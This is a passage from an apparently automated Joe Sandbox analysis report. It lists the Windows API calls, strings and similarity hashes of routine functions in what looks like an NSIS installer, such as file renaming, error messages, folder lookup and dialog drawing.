GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Strings

[Rename], xrefs: 0040611D, 0040612F
%ls=%ls, xrefs: 004060A9

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 00402F30 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0

Strings

Error launching installer, xrefs: 00402F80
soft, xrefs: 00403020
Null, xrefs: 00403029
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
Inst, xrefs: 00403017

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

%s%S.dll, xrefs: 0040679E
UXTHEME, xrefs: 0040675B
\, xrefs: 0040677A

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

verifying installer: %d%%, xrefs: 00402E3A
unpacking data: %d%%, xrefs: 00402E33, 00402E43

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

%u.%u%s%s, xrefs: 00404C97
(7B, xrefs: 00404C9F

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

*?|<>/":, xrefs: 004066CE

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
